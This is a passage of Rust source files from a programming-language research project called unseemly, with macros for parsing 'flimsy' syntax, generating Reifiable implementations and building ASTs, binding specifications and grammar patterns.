uty { ($( $ts:tt )*) => { { let mut old_default_nt = "".to_owned(); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { old_default_nt = def_nt.borrow().clone(); *def_nt.borrow_mut() = "Type".to_owned(); }); let res = u!( $($ts)* ); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { *def_nt.borrow_mut() = old_default_nt; }); res } }; } macro_rules! upat { ($( $ts:tt )*) => { { let mut old_default_nt = "".to_owned(); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { old_default_nt = def_nt.borrow().clone(); *def_nt.borrow_mut() = "Pat".to_owned(); }); let res = u!( $($ts)* ); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { *def_nt.borrow_mut() = old_default_nt; }); res } }; } fn parse_flimsy_seq<'a, I>(flimsy_seq: &mut Peekable<I>, grammar: &FormPat) -> EnvMBE<Ast> where I: Iterator<Item = &'a Ast> { use crate::grammar::FormPat::*; match grammar { Seq(ref grammar_parts) => { let mut result = EnvMBE::new(); for grammar_part in grammar_parts { result = result.combine_overriding(&parse_flimsy_seq(flimsy_seq, grammar_part)); } result } _ => { // `Anyways`es shouldn't consume anything (and they'll always be `Named`): let consuming = match grammar { Named(_, ref body) => match **body { Anyways(_) => false, // HACK: special case for core_macro_forms::macro_invocation. // There has to be a less flimsy way of doing this. QuoteDeepen(ref body, _) | QuoteEscape(ref body, _) => match **body { Anyways(_) => false, _ => true, }, _ => true, }, _ => true, }; let trivial = raw_ast!(Trivial); let flimsy = match flimsy_seq.peek() { None if consuming => return EnvMBE::new(), // Or is this an error? 
None => &trivial, Some(f) => f, }; match parse_flimsy_mbe(&flimsy, grammar) { None => EnvMBE::new(), Some(res) => { if consuming { let _ = flimsy_seq.next(); } res } } } } } pub fn parse_flimsy_mbe(flimsy: &Ast, grammar: &FormPat) -> Option<EnvMBE<Ast>> { use crate::grammar::FormPat::*; match grammar { Literal(_, _) => None, Call(_) => None, Scan(_, _) => None, Seq(_) => match flimsy.c() { Shape(flimsy_parts) => { if flimsy_parts[0].c() != &Atom(n("SEQ")) { panic!("Needed a SEQ, got {}", flimsy) } let mut fpi = flimsy_parts[1..].iter().peekable(); Some(parse_flimsy_seq(&mut fpi, grammar)) } _ => panic!("Needed a SEQ shape, got {}", flimsy), }, Star(ref body) | Plus(ref body) => match flimsy.c() { Shape(flimsy_parts) => { if flimsy_parts[0].c() != &Atom(n("REP")) { panic!("Need a REP, got {}", flimsy_parts[0]) } let mut reps = vec![]; for flimsy_part in flimsy_parts[1..].iter() { reps.push(parse_flimsy_mbe(flimsy_part, &*body).unwrap()); } Some(EnvMBE::new_from_anon_repeat(reps)) } _ => panic!("Needed a REP shape, got {}", flimsy), }, Alt(ref subs) => { // HACK: always pick the first branch of the `Alt` // (mainly affects unquotation, where it skips the type annotation) parse_flimsy_mbe(flimsy, &*subs[0]) } Named(name, ref body) => Some(EnvMBE::new_from_leaves( crate::util::assoc::Assoc::new().set(*name, parse_flimsy_ast(flimsy, &*body)), )), SynImport(_, _, _) => panic!("`SynImport` can't work without a real parser"), NameImport(_, _) => panic!("`NameImport` should live underneath `Named`: {:?}", grammar), _ => unimplemented!("Can't handle {:?}", grammar), } } fn parse_flimsy_ast(flimsy: &Ast, grammar: &FormPat) -> Ast { use crate::grammar::FormPat::*; match grammar { Anyways(ref a) => a.clone(), Impossible => unimplemented!(), Scan(_, _) => flimsy.clone(), Literal(_, _) => raw_ast!(Trivial), VarRef(_) => match flimsy.c() { VariableReference(a) => raw_ast!(VariableReference(*a)), non_atom => panic!("Needed an atom, got {}", non_atom), }, NameImport(body, beta) => { 
raw_ast!(ExtendEnv(parse_flimsy_ast(flimsy, &*body), beta.clone())) } NameImportPhaseless(body, beta) => { raw_ast!(ExtendEnvPhaseless(parse_flimsy_ast(flimsy, &*body), beta.clone())) } QuoteDeepen(body, pos) => raw_ast!(QuoteMore(parse_flimsy_ast(flimsy, &*body), *pos)), QuoteEscape(body, depth) => raw_ast!(QuoteLess(parse_flimsy_ast(flimsy, &*body), *depth)), Call(name) => { // HACK: don't descend into `Call(n("DefaultAtom")) if *name == n("DefaultAtom") || *name == n("AtomNotInPat") { match flimsy.c() { VariableReference(a) => raw_ast!(Atom(*a)), non_atom => panic!("Needed an atom, got {}", non_atom), } } else { flimsy.clone() } } _ => unimplemented!("Can't handle {:?}", grammar), } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/macros/reification_macros.rs
src/macros/reification_macros.rs
#![macro_use] // This isn't as bad as it looks. // I mean, it's pretty bad, don't get me wrong... // // The purpose is to generate `Reifiable` `impl`s // for any `enum` or `struct`. // // Basically, `reify` pattern-matches to destructure the actual Rust value, // and then constructs a `Value` of the corresponding shape. // // And `reflect` does the opposite. // // But, in the process, I have to work around // what feels like every single limitation of `macro_rules!` in Rust, // as if I were aiming for them. // // Who wrote that piece of junk, anyway? // // This should be rewritten, now that user-defined derives are stable. macro_rules! Reifiable { // HACK: everything is parameterized over 't... /* struct */ ((lifetime) $(#[$($whatever:tt)*])* $(pub)* struct $name:ident<$lifetime:tt> { $($contents:tt)* }) => { Reifiable!((remove_p_and_a) struct $name<$lifetime> @ { $($contents)*, } ); // HACK: we add commas to the end of the contents, becuase it's easier to parse // if they end in a comma (this breaks `structs` that already have final commas...) }; ((lifetime) $(#[$($whatever:tt)*])* $(pub)* struct $name:ident<$lifetime:tt $(, $ty_param_ty:ident)*> { $($contents:tt)* }) => { Reifiable!((remove_p_and_a) struct $name<$lifetime $(, $ty_param_ty)*> @ <$($ty_param_ty),*> { $($contents)*, } ); }; // no lifetime parameter (() $(#[$($whatever:tt)*])* $(pub)* struct $name:ident$(<$($ty_param_ty:ident),*>)* { $($contents:tt)* }) => { Reifiable!((remove_p_and_a) struct $name$(<$($ty_param_ty),*>)* @ $(<$($ty_param_ty),*>)* { $($contents)*, } ); }; // TODO: This lacks support for type-parameterized `struct`s ... // done! Go to `make_impl`! 
((remove_p_and_a) $(pub)* struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $(,)* } $( [ $( $accum:tt )* ] )* ) => { Reifiable!((make_impl) struct $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $($($accum)*)* } ); }; // remove `pub` ((remove_p_and_a) $(pub)* struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { pub $($contents:tt)* } $( [ $( $accum:tt )* ] )* ) => { Reifiable!((remove_p_and_a) struct $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $contents )* } $( [ $($accum)* ] )* ); }; // remove attributes (such as `///`!) ((remove_p_and_a) $(pub)* struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { #[$($whatever:tt)*] $($contents:tt)* } $( [ $( $accum:tt )* ] )* ) => { Reifiable!((remove_p_and_a) struct $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $contents )* } $( [ $($accum)* ] )*); }; // no `pub` or attr this time ((remove_p_and_a) $(pub)* struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $field_car:ident : $t_car:ty, $($cdr:tt)* } $( [ $( $accum:tt )* ] )* ) => { Reifiable!((remove_p_and_a) struct $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $cdr )* } [ $field_car : $t_car $(, $($accum)* )* ]); }; ((make_impl) struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $( $field:ident : $t:ty),* }) => { impl<'t $($(, $ty_param_ty : crate::runtime::reify::Reifiable)*)*> crate::runtime::reify::Reifiable for $name<$($($ty_param),*)*> { fn ty() -> crate::ast::Ast { type_defn_wrapper!($(<$($ty_param_ty),*>)* => { "Type" "struct" : "component_name" => [@"c" $( (at stringify!($field)) ),* ], "component" => // TODO: unless we specify arguments with the same name as parameters, // we get bogus results // (we get // ∀ K V. μ Assoc. struct{ n: Option<AssocNode<ident rust_usize>> } // rather than // ∀ K V. μ Assoc. 
struct{ n: Option<AssocNode<K V>> } [@"c" $( (, <$t as crate::runtime::reify::Reifiable>::ty_invocation() ) ),*] }) } fn ty_name() -> crate::name::Name { crate::name::n(stringify!($name)) } fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> { // HACK: at runtime, check to see if we need type parameters by making a vector let argument_list : Vec<&str> = vec![$( $( stringify!($ty_param_ty) ),* )*]; if argument_list.len() > 0 { Some(vec![ $( $( <$ty_param_ty>::ty_invocation() ),* )* ]) } else { None } } fn reify(&self) -> crate::runtime::eval::Value { crate::runtime::eval::Struct(assoc_n!( $( (stringify!($field)) => self.$field.reify()),* )) } #[allow(unused_variables)] fn reflect(v: &crate::runtime::eval::Value) -> Self { extract!((v) crate::runtime::eval::Struct = (ref env) => $name { $( $field : <$t as crate::runtime::reify::Reifiable>::reflect( env.find(&crate::name::n(stringify!($field))).unwrap())),* }) } } }; /* enum */ // `lifetime` means that we need to pull off a lifetime argument. // The whole set of type parameters comes after `name`; // we make a just-the-types type parameters after the @. ((lifetime) $(#[$($whatever:tt)*])* $(pub)* enum $name:ident<$lifetime:tt> { $( $contents:tt )* }) => { Reifiable!((remove_attr) enum $name<$lifetime> @ { $( $contents )* , }); }; ((lifetime) $(#[$($whatever:tt)*])* $(pub)* enum $name:ident<$lifetime:tt $(, $ty_param_ty:ident)*> { $( $contents:tt )* }) => { Reifiable!((remove_attr) enum $name<$lifetime $(, $ty_param_ty)*> @ <$($ty_param_ty),*> { $( $contents )* , }); }; (() $(#[$($whatever:tt)*])* $(pub)* enum $name:ident$(<$($ty_param_ty:ident),*>)* { $( $contents:tt )* }) => { Reifiable!((remove_attr) enum $name$(<$($ty_param_ty),*>)* @ $(<$($ty_param_ty),*>),* { $( $contents )* , }); }; // done! 
(has to go first) ((remove_attr) enum $name:ident$(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $(,)* } $([ $($accum:tt)* ])*) => { Reifiable!((make_impl) enum $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $($( $accum )*)* } ); }; // drop the attribute ((remove_attr) enum $name:ident$(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { #[ $($whatever:tt)* ] $( $contents:tt )* } $([ $($accum:tt)* ])* ) => { Reifiable!((remove_attr) enum $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $contents )* } $([ $($accum)* ])* ); }; // no attribute this time ((remove_attr) enum $name:ident$(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $choice:ident$(( $($part:ty),* ))*, $( $contents:tt )* } $([ $($accum:tt)* ])*) => { Reifiable!((remove_attr) enum $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $contents )* } [ $choice $(( $($part),* ))* , $($($accum)*)* ]); }; // The `$((...))*` and `$(<...>)*` patterns deal with the fact that the `()` and `<>` // might be completely absent (the `*` matches 0 or 1 times) // The second set of type parameters are those that are not lifetime params... 
((make_impl) enum $name:ident$(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $($choice:ident$(( $($part:ty),* ))* ,)* }) => { impl<'t $($(, $ty_param_ty : crate::runtime::reify::Reifiable)*)*> crate::runtime::reify::Reifiable for $name<$($($ty_param),*)*> { fn ty() -> crate::ast::Ast { type_defn_wrapper!($(<$($ty_param_ty),*>)* => { "Type" "enum" : "name" => [@"c" $( (at (stringify!($choice))) ),* ], "component" => [@"c" $( [ $($( (, <$part as crate::runtime::reify::Reifiable>::ty_invocation() ) ),*)*]),*] }) } fn ty_name() -> crate::name::Name { crate::name::n(stringify!($name)) } fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> { // HACK: at runtime, check to see if we need type parameters by making a vector let argument_list : Vec<&str> = vec![$( $( stringify!($ty_param_ty) ),* )*]; if argument_list.len() > 0 { Some(vec![ $( $( <$ty_param_ty>::ty_invocation() ),* )* ]) } else { None } } #[allow(unused_mut)] // rustc bug! `v` has to be mutable, but it complains fn reify(&self) -> crate::runtime::eval::Value { match *self { $( choice_pat!( ( $($($part),*)* ) (a b c d e f g h i j k l m n o p q r s t) $name::$choice ; ()) => { let mut v = vec![]; choice_vec!( ( $($($part),*)* ) (a b c d e f g h i j k l m n o p q r s t) v); crate::runtime::eval::Value::Enum(crate::name::n(stringify!($choice)), v) } ),* } } #[allow(unused_variables)] fn reflect(v: &crate::runtime::eval::Value) -> Self { extract!((v) crate::runtime::eval::Enum = (ref choice, ref parts) => { make_enum_reflect!(choice; parts; $name$(<$($ty_param),*>)*/**/ { $($choice $(( $($part),* ))*),* } ) }) } } } } // makes a pattern matching an enum with _n_ components, using the first _n_ // of the input names (be sure to supply enough names!) macro_rules! 
choice_pat { ( ($t_car:ty $(, $t_cdr:ty)* ) ($i_car:ident $($i_cdr:ident)*) $choice:path; ($($accum:ident),*)) => { choice_pat!( ($($t_cdr),* ) ($($i_cdr)*) $choice; ($i_car $(, $accum)*)) }; ( ( ) ($($i_cdr:ident)*) $choice:path; ( ) ) => { $choice }; ( ( ) ($($i_cdr:ident)*) $choice:path; ( $($accum:ident),+ ) ) => { $choice($(ref $accum),*) }; } macro_rules! choice_vec { /* the types are ignored, except for how many of them there are */ ( ($t_car:ty $(, $t_cdr:ty)*) ($i_car:ident $($i_cdr:ident)*) $v:expr) => { { choice_vec!( ($($t_cdr),*) ($($i_cdr)*) $v); $v.push($i_car.reify()); } }; ( ( ) ($($i_cdr:ident)*) $v:expr) => { {} } } // workaround for MBE limitation; need to walk choices, but *not* ty_param, // so we use this to manually walk over the choices macro_rules! make_enum_reflect { ($choice_name:ident; $parts_name:ident; $name:ident$(<$($ty_param:tt),*>)*/**/ { $choice_car:ident $(( $($part_cars:ty),* ))* $(, $choice_cdr:ident$(( $($part_cdr:ty),* ))*)* }) => { if $choice_name.is(stringify!($choice_car)) { unpack_parts!( $(( $($part_cars),* ))* $parts_name; 0; $name::$choice_car$(::< $($ty_param),* >)*; ()) } else { make_enum_reflect!($choice_name; $parts_name; $name$(<$($ty_param),*>)*/**/ { $($choice_cdr $(( $($part_cdr),* ))* ),* }) } }; ($choice_name:ident; $parts_name:ident; $name:ident$(<$($ty_param:tt),*>)*/**/ { } ) => { icp!("invalid enum choice: {:#?}", $choice_name) } } macro_rules! unpack_parts { ( ($t_car:ty $(, $t_cdr:ty)*) $v:expr; $idx:expr; $ctor:expr; ($($accum:expr),*)) => { unpack_parts!( ( $($t_cdr),* ) $v; ($idx + 1); $ctor; ($($accum, )* <$t_car as crate::runtime::reify::Reifiable>::reflect(& $v[$idx]))) }; ( () $v:expr; $idx:expr; $ctor:expr; ($($accum:expr),*)) => { $ctor($($accum),*) }; ( $v:expr; $idx:expr; $ctor:expr; ()) => { $ctor // special case: a value, not a 0-arg constructor } } // For `ty` macro_rules! 
type_defn_wrapper { ( $(<$($ty_param_ty:ident),*>)* => $body:tt ) => {{ // In this context, we want reification of the type parameters // to produce type variables, not whatever those parameters "actually" are // (because they're actually `Irr`, since they are irrelevant). $( $( struct $ty_param_ty {} impl crate::runtime::reify::Reifiable for $ty_param_ty { fn ty_name() -> crate::name::Name { crate::name::n(stringify!($ty_param_ty)) } fn reify(&self) -> crate::runtime::eval::Value { icp!() } fn reflect(_: &crate::runtime::eval::Value) -> Self { icp!() } } )* )* // All types will be ∀, even if in Rust they have no parameters; // this is safe, but a nuisance. // All types will be μ. I think this is the way things work in most languages. ast!({"Type" "forall_type" : "param" => [ $($( (at stringify!($ty_param_ty))),*)*], "body" => (import [* [forall "param"]] {"Type" "mu_type" : "param" => [(import [prot "param"] (vr Self::ty_name()))], "body" => (import [* [prot "param"]] $body) }) }) }} } macro_rules! refer_to_type { ($name:tt < $( $arg:ty ),* >) => { ast!({ "Type" "type_apply" : "type_rator" => (, ::ast::Ast::VariableReference(::name::n(stringify!($name))) ), "arg" => [ (, $( refer_to_type!($arg)),* )] }) }; ($name:tt) => { ::ast::Ast::VariableReference(::name::n(stringify!($name))) } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/macros/macros.rs
src/macros/macros.rs
#![macro_use] // TODO: use a real logging framework macro_rules! log { ($($e:expr),*) => { // print!( $($e),* ); }; } macro_rules! icp { () => { panic!("ICP: can't happen") }; ( $($arg:expr),* ) => { panic!("ICP: {}", format!( $($arg),* ) ) }; } // Assoc macro_rules! expr_ify { ($e:expr) => { $e }; } macro_rules! assoc_n { () => { crate::util::assoc::Assoc::new() }; ( $k:tt => $v:expr $(, $k_cdr:tt => $v_cdr:expr)* ) => { assoc_n!( $( $k_cdr => $v_cdr ),* ).set(crate::name::n(expr_ify!($k)), $v) }; ( ($k:expr) => $v:expr $(, $k_cdr:tt => $v_cdr:expr)* ) => { assoc_n!( $( $k_cdr => $v_cdr ),* ).set(::name::n($k), $v) }; } // Beta macro_rules! beta_connector { ($lhs:tt : $rhs:tt) => { crate::beta::Basic(crate::name::n(expr_ify!($lhs)), crate::name::n(expr_ify!($rhs))) }; ($lhs:tt = $rhs:tt) => { crate::beta::SameAs( crate::name::n(expr_ify!($lhs)), Box::new(raw_ast!(VariableReference(crate::name::n(expr_ify!($rhs))))), ) }; // TODO: this needs a better notation, somehow ($lhs:tt == $rhs:tt) => { crate::beta::SameAs(crate::name::n(expr_ify!($lhs)), Box::new(ast!($rhs))) }; ($lhs:tt += $rhs:tt) => { crate::beta::SameAs(crate::name::n(expr_ify!($lhs)), Box::new(u!($rhs))) }; } macro_rules! 
beta { ( [] ) => { crate::beta::Nothing }; ( [* $body:tt ]) => { { let sub = beta!($body); let drivers = sub.names_mentioned(); crate::beta::ShadowAll(Box::new(sub), drivers) } }; ( [ forall $name:tt $( $rest:tt )*] ) => { crate::beta::Shadow(Box::new( crate::beta::Underspecified( crate::name::n(expr_ify!($name)))), Box::new(beta!( [ $( $rest )* ] ))) }; ( [ prot $name:tt $( $rest:tt )*] ) => { crate::beta::Shadow(Box::new( crate::beta::Protected( crate::name::n(expr_ify!($name)))), Box::new(beta!( [ $( $rest )* ] ))) }; ( [ unusable $name:tt $( $rest:tt )*] ) => { crate::beta::Shadow(Box::new( crate::beta::BoundButNotUsable(crate::name::n(expr_ify!($name)))), Box::new(beta!( [ $( $rest )* ] ))) }; // Just makes things prettier by not ending everything in " ▷ ∅": ( [ $name:tt $connector:tt $t:tt ] ) => { beta_connector!($name $connector $t) }; ( [ $name:tt $connector:tt $t:tt $( $rest:tt )* ] ) => { crate::beta::Shadow(Box::new(beta_connector!($name $connector $t)), Box::new(beta!( [ $( $rest )* ] ))) }; } macro_rules! ebeta { ( [] ) => { crate::beta::ExportBeta::Nothing }; ( [* $body:tt ]) => { { let sub = ebeta!($body); let drivers = sub.names_mentioned(); crate::beta::ExportBeta::ShadowAll(Box::new(sub), drivers) } }; ( [ $name:tt $( $rest:tt )*] ) => { crate::beta::ExportBeta::Shadow(Box::new(crate::beta::ExportBeta::Use(crate::name::n(expr_ify!($name)))), Box::new(ebeta!( [ $( $rest )* ] ))) }; } // Read macro_rules! tokens_s { () => { "" }; ($($contents:tt)*) => { &vec![ $( $contents ),* ].join(" ") } } macro_rules! 
t_elt { ( [ $e:expr ; $( $list:tt )* ] ) => { { let mut toks = vec![::name::n(concat!($e,"["))]; toks.append(&mut tokens!($($list)*).t); toks.push(::name::n(concat!("]", $e))); toks } }; ( { $e:expr ; $( $list:tt )* } ) => { { let mut toks = vec![::name::n(concat!($e,"{"))]; toks.append(&mut tokens!($($list)*).t); toks.push(::name::n(concat!("}", $e))); toks } }; ( ( $e:expr ; $( $list:tt )* ) ) => { { let mut toks = vec![::name::n(concat!($e,"("))]; toks.append(&mut tokens!($($list)*).t); toks.push(::name::n(concat!(")", $e))); toks } }; ($e:expr) => { vec![::name::n(& $e.replace(" ", "_"))] } } // Ast // AstContents to Ast. // Whenever possible, use `ast!` directly (or, in tests, `u!`). macro_rules! raw_ast { ($ast_kind:ident) => { crate::ast::Ast(std::rc::Rc::new(crate::ast::LocatedAst { c: crate::ast::AstContents::$ast_kind, // TODO: would Rust file info be useful? file_id: 0, begin: 0, end: 0 })) }; ($ast_kind:ident ( $( $body:expr ),* ) ) => { crate::ast::Ast(std::rc::Rc::new(crate::ast::LocatedAst { c: crate::ast::AstContents::$ast_kind( $( $body ),* ), // TODO: would Rust file info be useful? file_id: 0, begin: 0, end: 0 })) } } macro_rules! ast_shape { ($($contents:tt)*) => { raw_ast!(Shape(vec![ $( ast!($contents) ),* ] ))}; } macro_rules! 
ast { ( (trivial) ) => { raw_ast!(Trivial) }; ( (++ $pos:tt $sub:tt) ) => { raw_ast!(QuoteMore(ast!($sub), $pos)) }; ( (-- $depth:tt $sub:tt ) ) => { raw_ast!(QuoteLess(ast!($sub), $depth)) }; ( (import $beta:tt $sub:tt) ) => { raw_ast!(ExtendEnv(ast!($sub), beta!($beta))) }; ( (import_phaseless $beta:tt $sub:tt) ) => { raw_ast!(ExtendEnvPhaseless(ast!($sub), beta!($beta))) }; /* // not sure we'll need this ( (* $env:expr => $new_env:ident / $($n:expr),* ; $($sub_ar"gs:tt)*) ) => { { let mut res = vec![]; for $new_env in $env.march_all( &vec![$($n),*] ) { res.push(ast!($sub)) } res.reverse(); Shape(res) } };*/ ( (vr $var:expr) ) => { raw_ast!(VariableReference(crate::name::Name::from($var))) }; // Like the last clause, but explicit about being an atom: ( (at $var:expr) ) => { raw_ast!(Atom(crate::name::Name::from($var))) }; ( (, $interpolate:expr)) => { $interpolate }; // TODO: maybe we should use commas for consistency: ( ( $( $list:tt )* ) ) => { ast_shape!( $($list)* ) }; ( { - $($mbe_arg:tt)* } ) => { raw_ast!(IncompleteNode(mbe!( $($mbe_arg)* ))) }; ( { $nt:tt $form:tt => $beta:tt : $($mbe_arg:tt)*} ) => { raw_ast!(Node(crate::core_forms::find($nt, $form), mbe!( $($mbe_arg)* ), ebeta!($beta))) }; ( { $form:expr => $beta:tt ; $($mbe_arg:tt)*} ) => { raw_ast!(Node($form, mbe!( $($mbe_arg)* ), ebeta!($beta))) }; ( { $form:expr; [ $($mbe_arg:tt)* ] }) => { ast!( { $form ; $($mbe_arg)* } ) }; ( { $form:expr; $($mbe_arg:tt)* }) => { raw_ast!(Node($form, mbe!( $($mbe_arg)* ), crate::beta::ExportBeta::Nothing)) }; ( { $nt:tt $form:tt : $($mbe_arg:tt)* }) => { raw_ast!(Node(crate::core_forms::find($nt, $form), mbe!( $($mbe_arg)* ), crate::beta::ExportBeta::Nothing)) }; // Accepts either `&str` (most common) or `Names`: ($e:expr) => { raw_ast!(Atom(crate::name::Name::from($e))) }; } // These construct spanned type errors (so, for type synthesis, not subtyping) macro_rules! 
ty_err_val { ( $name:tt ( $($arg:expr),* ) at $loc:expr) => { crate::util::err::sp(crate::ty::TyErr::$name( $($arg),* ), $loc.clone()) } } macro_rules! ty_err { ( $name:tt ( $($arg:expr),* ) at $loc:expr) => { return Err(ty_err_val!( $name ( $($arg),* ) at $loc)) } } macro_rules! ty_exp { // type expectation ( $got:expr, $expected:expr, $loc:expr) => { if $got != $expected { ty_err!(Mismatch((*$got).clone(), (*$expected).clone()) at $loc) } } } macro_rules! ty_err_p { // type error pattern ( $name:tt ( $($arg:pat),* ) ) => { Err( crate::util::err::Spanned { body: crate::ty::TyErr::$name( $($arg),* ), loc: _ } ) } } // EnvMBE // These macros generate `EnvMBE<Ast>`s, not arbitrary `EnvMBE`s, // which is a little un-abstract, but is the main usage. // Wait a second, I'm writing in Rust right now! I'll use an MBE macro to implement an MBE literal! macro_rules! mbe_one_name { // `elt` ought to have an interpolation that references `new_env` // TODO: maybe this (and the parser!) ought to add 0-times-repeated leaves to `leaf_locations` /* TYPE PUN ALERT: $env has to be something with a `march_all` method; there's no trait enforcing this. But wait, isn't preventing this kind of nonsense the whole point of this project? Well, you know the old saying: "While the mice are implementing the cat, the mice will play." */ ($k:tt => [* $env:expr =>($($n:expr),*) $new_env:ident : $elt:tt]) => { { let mut v = vec![]; let marchee = vec![$(crate::name::n($n)),*]; for $new_env in $env.march_all(&marchee) { v.push( mbe_one_name!($k => $elt)); } crate::util::mbe::EnvMBE::new_from_anon_repeat(v) } }; // HACK: `new_from_{named,anon}_repeat` don't work if the repeat is empty! 
($k:tt => [@ $n:tt ]) => { crate::util::mbe::EnvMBE::<crate::ast::Ast>::new_from_empty_named_repeat( crate::name::n(expr_ify!($n)), &vec![crate::name::n(expr_ify!($k))] ) }; ($k:tt => []) => { crate::util::mbe::EnvMBE::<crate::ast::Ast>::new_from_empty_anon_repeat( &vec![crate::name::n(expr_ify!($k))] ) }; ($k:tt => [@ $n:tt $($elt:tt),+]) => { crate::util::mbe::EnvMBE::new_from_named_repeat( crate::name::n(expr_ify!($n)), vec![ $( mbe_one_name!($k => $elt) ),* ] ) }; ($k:tt => [$($elt:tt),+]) => { crate::util::mbe::EnvMBE::new_from_anon_repeat( vec![ $( mbe_one_name!($k => $elt) ),* ]) }; // since `Ast`s go on the RHS, we have to have a distinctive interpolation syntax ($k:tt => (,seq $e:expr)) => { { let seq_expr = $e; if (seq_expr.is_empty()) { crate::util::mbe::EnvMBE::new_from_empty_anon_repeat(&[crate::name::n(expr_ify!($k))]) } else { let mut v = vec![]; for elt in seq_expr { v.push(crate::util::mbe::EnvMBE::new_from_leaves(assoc_n!($k => elt))) } crate::util::mbe::EnvMBE::new_from_anon_repeat(v) } } }; ($k:tt => (@ $rep_n:tt ,seq $e:expr)) => { { let seq_expr = $e; if (seq_expr.is_empty()) { crate::util::mbe::EnvMBE::new_from_empty_named_repeat( crate::name::n(expr_ify!($rep_n)), &[crate::name::n(expr_ify!($k))]) } else { let mut v = vec![]; for elt in seq_expr { v.push(crate::util::mbe::EnvMBE::new_from_leaves(assoc_n!($k => elt))) } crate::util::mbe::EnvMBE::new_from_named_repeat(crate::name::n(expr_ify!($rep_n)), v) } } }; // For parsing reasons, we only accept expressions that are TTs. // It's hard to generalize the `mbe!` interface so that it accepts exprs // or `[]`-surrounded trees of them. ($k:tt => $leaf:tt) => { crate::util::mbe::EnvMBE::new_from_leaves(assoc_n!($k => ast!($leaf))) } } // Eventually, this ought to support more complex structures macro_rules! 
mbe { ( $( $lhs:tt => $rhs:tt ),* ) => {{ let single_name_mbes = vec![ $( mbe_one_name!($lhs => $rhs) ),*]; let mut res = crate::util::mbe::EnvMBE::new(); for m in &single_name_mbes { res = res.merge(m); } res }} } // FormPat // TODO #8: `ast!` and `form_pat!` are inconsistent with each other. macro_rules! form_pat { ((lit $e:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("DefaultToken"))), crate::name::n($e)) }; ((name_lit $e:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("DefaultWord"))), crate::name::n($e)) }; ((lit_aat $e:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::new_scan(r"\s*(\S+)", None)), crate::name::n($e)) }; ((name_lit__by_name $e:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("DefaultWord"))), $e) }; ((lit_tok $tok:tt, $lit:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(form_pat!($tok)), crate::name::n($lit)) }; ((scan_cat $e:expr, $cat:expr)) => { crate::grammar::new_scan($e, Some(String::from($cat))) }; ((scan $e:expr)) => { crate::grammar::new_scan($e, None) }; ((reserved $body:tt, $( $res:tt )*)) => { crate::grammar::FormPat::Reserved(std::rc::Rc::new(form_pat!($body)), vec![$( n($res) ),*]) }; ((reserved_by_name_vec $body:tt, $names:expr)) => { crate::grammar::FormPat::Reserved(std::rc::Rc::new(form_pat!($body)), $names) }; ((common $body:tt)) => { crate::grammar::FormPat::Common(std::rc::Rc::new(form_pat!($body))) }; ((anyways $a:tt)) => { crate::grammar::FormPat::Anyways(ast!($a)) }; ((impossible)) => { crate::grammar::FormPat::Impossible }; (atom) => { crate::grammar::FormPat::Call(crate::name::n("AtomNotInPat")) }; (varref) => { crate::grammar::FormPat::VarRef( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("DefaultAtom"))) ) }; ((varref_call $n:tt)) => { crate::grammar::FormPat::VarRef( 
std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n($n))) ) }; (varref_aat) => { crate::grammar::FormPat::VarRef( std::rc::Rc::new(crate::grammar::new_scan(r"\s*(\S+)", None)) ) }; ((delim $n:expr, $d:expr, $body:tt)) => { crate::grammar::FormPat::Seq(vec![ std::rc::Rc::new(crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("OpenDelim"))), crate::name::n($n))), std::rc::Rc::new(form_pat!($body)), { let mut main_tok = $n.to_owned(); main_tok.pop(); std::rc::Rc::new(crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("CloseDelim"))), crate::name::n(&format!("{}{}", crate::read::delim($d).close(), main_tok)))) }]) }; ((star $body:tt)) => { crate::grammar::FormPat::Star(std::rc::Rc::new(form_pat!($body))) }; ((plus $body:tt)) => { crate::grammar::FormPat::Plus(std::rc::Rc::new(form_pat!($body))) }; ((alt $($body:tt),* )) => { crate::grammar::FormPat::Alt(vec![ $( 